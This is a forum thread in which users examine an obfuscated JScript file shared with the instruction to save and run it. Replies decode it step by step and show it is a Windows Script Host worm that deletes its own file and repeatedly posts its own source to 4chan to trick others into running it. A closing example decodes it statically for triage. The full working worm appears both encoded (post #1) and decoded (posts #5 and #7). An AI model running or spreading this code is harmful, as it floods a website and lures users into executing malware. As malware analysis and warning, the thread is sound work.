  1. #1

    Question [JS] Weird script... :S

    I've been browsing the internet and found this script:

    Code:
    nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n"+
    "7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ"+
    "|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n"+
    "7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n"+
    "8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n"+
    "9l8]C6252==WX\r\n"+
    "8]4=@D6WX\r\n"+
    "7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\n"+
    "IlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O"+
    "7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO"+
    "3C:4<D]-C-?-C-?QZ9\r\n"+
    "2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\n"+
    "H9:=6W`XL\r\n"+
    "2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n"+
    "2]D6?5WX\r\n"+
    "3l2]C6DA@?D6E6IE\r\n"+
    "4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n"+
    "5lQQ\r\n"+
    "6lQQ\r\n"+
    "7@CW:l_j:ka_j:ZZX5ZlCWX\r\n"+
    "7@CW:l_j:kgj:ZZX6ZlCWX\r\n"+
    "2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\n"+
    "ElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n"+
    "2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n"+
    "2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\n"+
    "Qa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\n"+
    "Qr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\Q"+
    "Z5ZQ-C-?QZ\r\n"+
    "<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
    "<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n"+
    "($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN"
    e=eval
    e('vv="";for(i=0;i<nm.len'+'gth;i++){;if(nm.charA'+
    't(i)=="\\r")vv+="\\r";e'+'lse if(nm.cha'+'rAt(i'+
    ')=="\\n'+'")vv+="\\n";el'+'se vv+=String.fromCh'+
    'arCode((nm.ch'+
    'arC'+'odeAt(i)-32+47)%94+32)};ev'+
    'al(vv);');;;;;;;;;;;
    The guys who posted it also wrote that:
    Code:
    COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THAN RUN IT...
    what will happen?

  • #2
    Supreme Master coder! Philip M's Avatar
    Quote: Originally Posted by bulld0z3r
    COPY POSTED SCRIPT TO NOTEPAD AND SAVE THE FILE AS .JS AND THEN RUN IT...

    what will happen?

    I'll give you three guesses, but I would expect that your computer will be infected with a malicious virus or trojan. The eval() function evaluates a string and executes it as if it was script code. In this case the string is encrypted. Or perhaps nothing will happen. Suggest you try it and post back (if your computer is still working).


    Press any key to continue or any other key to quit
    Last edited by Philip M; 09-01-2008 at 08:05 AM.

  • #3
    What you have there is encrypted JavaScript.

    Some source-code protection programs allow you to encrypt the JavaScript source into (effectively) trash, hence stopping the majority of people from viewing the source.

    I'd say that's what's happened here - though as bulld0z3r said - beware of hidden code like that as it can pull all sorts of rubbish to your PC.

  • #4
    Quote: "into (effectively) trash"
    Decoding things like this is usually incredibly easy.

  • #5
    Decoding isn't hard. First, simply merge the split strings.
    Code:
    nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
    e=eval;
    e('vv="";for(i=0;i<nm.length;i++){;if(nm.charAt(i)=="\\r")vv+="\\r";else if(nm.charAt(i)=="\\n")vv+="\\n";else vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)};eval(vv);');
    Okay, then take the eval part and replace it with the code that is being run in it:
    Code:
    nm="<lQr@?E6?E\\s:DA@D:E:@?iO7@C>\\52E2jO?2>6lQ\r\n7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n9l8]C6252==WX\r\n8]4=@D6WX\r\n7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\nIlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO3C:4<D]-C-?-C-?QZ9\r\n2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\nH9:=6W`XL\r\n2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n2]D6?5WX\r\n3l2]C6DA@?D6E6IE\r\n4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n5lQQ\r\n6lQQ\r\n7@CW:l_j:ka_j:ZZX5ZlCWX\r\n7@CW:l_j:kgj:ZZX6ZlCWX\r\n2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\nElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n2]D6?5WQ\\\\QZ5ZQ-C-?QZ<ZQ-Q|p)0ux{t0$x+t-Q-C-?-C-?QZ\r\nQa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QC6DE@-Q-C-?-C-?QZ4ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q?2>6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q6>2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QDF3-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q4@>-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QFA7:=6-QjO7:=6?2>6l-Q-Q-C-?QZ\r\nQr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-QAH5-Q-C-?-C-?QZ6ZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n<ZQ-Q>@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN";
    e=eval;
    vv="";
    for(i=0;i<nm.length;i++){
        if(nm.charAt(i)=="\r")
            vv+="\r";
        else if(nm.charAt(i)=="\n")
            vv+="\n";
        else
            vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)
    };
    eval(vv);
    The code should be pretty self-explanatory by now, but to be brief, vv ends up being the result of doing a rot47 on the sequence of 94 characters that start at whitespace (U+0020) - as well as preserving any line feeds (U+000A) and carriage returns (U+000D) - in the original variable nm.

    The result of replacing the eval(vv); with its code is the following:
    Code:
    k="Content-Disposition: form-data; name="
    
    function r(){return String.fromCharCode("a".charCodeAt(0)+Math.floor(Math.random()*26))}
    
    f=WSH.createobject("scripting.filesystemobject")
    
    g=f.opentextfile(WSH.scriptfullname)
    
    h=g.readall()
    
    g.close()
    
    f.deletefile(WSH.scriptfullname)
    
    x="Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and **** bricks.\r\n\r\n"+h
    
    a=WSH.createobject("msxml2.xmlhttp")
    
    while(1){
    
    a.open("get","http://img.4chan.org/b",0)
    
    a.send()
    
    b=a.responsetext
    
    c=b.substr(b.indexOf("res/")+4,8)
    
    d=""
    
    e=""
    
    for(i=0;i<20;i++)d+=r()
    
    for(i=0;i<8;i++)e+=r()
    
    a.open("post","http://dat.4chan.org/b/imgboard.php",0)
    
    t="multipart/form-data; boundary="+d
    
    a.setrequestheader("Content-Type",t)
    
    a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+
    
    "2097152\r\n--"+d+"\r\n"+
    
    k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+
    
    k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+
    
    k+"\"upfile\"; filename=\"\"\r\n"+
    
    "Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+
    
    k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+
    
    k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n")
    
    WSH.sleep(3e4+Math.floor(Math.random()*3e4))}
    Last edited by liorean; 09-01-2008 at 10:13 PM.
    liorean <[lio@wg]>
    Articles: RegEx evolt wsabstract , Named Arguments
    Useful Threads: JavaScript Docs & Refs, FAQ - HTML & CSS Docs, FAQ - XML Doc & Refs
    Moz: JavaScript DOM Interfaces MSDN: JScript DHTML KDE: KJS KHTML Opera: Standards

  • #6
    Supreme Master coder! Philip M's Avatar
    And it actually does - what?

  • #7
    Well, let's see. It's designed to be run in the Windows Scripting Host. (Which is the default behaviour when opening .js files on Windows, which I find hilarious considering that writing .js files for homepages must be many times more usual than writing Windows scripts.)
    Code:
    f=WSH.createobject("scripting.filesystemobject");
    g=f.opentextfile(WSH.scriptfullname);
    h=g.readall();
    g.close();
    f.deletefile(WSH.scriptfullname);
    This part reads the content of the file (the OP's source code, that is) into the variable h and then deletes that file.


    Code:
    a=WSH.createobject("msxml2.xmlhttp");
    while(1){
        a.open("get","http://img.4chan.org/b",0);
        a.send();
        b=a.responsetext;
        c=b.substr(b.indexOf("res/")+4,8);
    This part seems to mine a certain string out of a 4chan page.


    Code:
        d="";
        e="";
        for(i=0;i<20;i++)d+=r();
        for(i=0;i<8;i++)e+=r();
        a.open("post","http://dat.4chan.org/b/imgboard.php",0);
        t="multipart/form-data; boundary="+d;
        a.setrequestheader("Content-Type",t);
        a.send("--"+d+"\r\n"+k+"\"MAX_FILE_SIZE\"\r\n\r\n"+
            "2097152\r\n--"+d+"\r\n"+
            k+"\"resto\"\r\n\r\n"+c+"\r\n--"+d+"\r\n"+
            k+"\"name\"\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"email\"\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"sub\"\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"com\"\r\n\r\n"+x+"\r\n--"+d+"\r\n"+
            k+"\"upfile\"; filename=\"\"\r\n"+
            "Content-Type: application/octet-stream\r\n\r\n\r\n--"+d+"\r\n"+
            k+"\"pwd\"\r\n\r\n"+e+"\r\n--"+d+"\r\n"+
            k+"\"mode\"\r\n\r\nregist\r\n--"+d+"--\r\n");
    This part seems to generate a random username and password and try to post the message the OP had seen to 4chan.



    Code:
        WSH.sleep(3e4+Math.floor(Math.random()*3e4));
    }
    And this part puts the script process to sleep after each try at posting, after which it will resume that infinite loop that started with the while(1){ above.
    Last edited by liorean; 09-02-2008 at 03:42 PM.
    liorean <[lio@wg]>
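
The decode described in post #5 and the behaviours walked through in post #7, as an added example that is not part of the original thread: it applies the same 47-place rotation but returns the text instead of passing it to eval, then flags the Windows Script Host calls the thread points out. The function names and the indicator list are assumptions made for this example; the four encoded lines are copied from the script in post #1.

```javascript
// Added example: static decode and triage. The decoded text is only inspected,
// never passed to eval or run under Windows Script Host.

// Same transform as the loader in the thread: rotate by 47 within the 94
// code points starting at U+0020, copying CR and LF through unchanged.
function decodeShift47(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const ch = text.charAt(i);
    if (ch === "\r" || ch === "\n") out += ch;
    else out += String.fromCharCode((text.charCodeAt(i) - 32 + 47) % 94 + 32);
  }
  return out;
}

// Hypothetical indicator list covering the calls explained in post #7.
const INDICATORS = [
  ["creates COM object", /createobject\s*\(\s*"([^"]+)"/i],
  ["deletes a file", /\.deletefile\s*\(/i],
  ["reads its own path", /scriptfullname/i],
  ["HTTP request", /\.open\s*\(\s*"(get|post)"/i],
];

// Return one finding per indicator hit, with the 1-based decoded line number.
function triage(decoded) {
  const findings = [];
  decoded.split(/\r?\n/).forEach((line, idx) => {
    for (const [label, re] of INDICATORS) {
      const m = re.exec(line);
      if (m) findings.push({ line: idx + 1, label, detail: m[1] || "" });
    }
  });
  return findings;
}

// Four encoded lines copied from the script in post #1.
const SAMPLE = [
  '7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX',
  '7]56=6E67:=6W($w]D4C:AE7F==?2>6X',
  '2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX',
  '2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X',
].join("\r\n");

for (const f of triage(decodeShift47(SAMPLE))) {
  console.log(`line ${f.line}: ${f.label} ${f.detail}`.trim());
}
```

Because the shift is 47 out of 94, running decodeShift47 twice returns the input, so the same function also re-encodes decoded text for comparison against the original.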

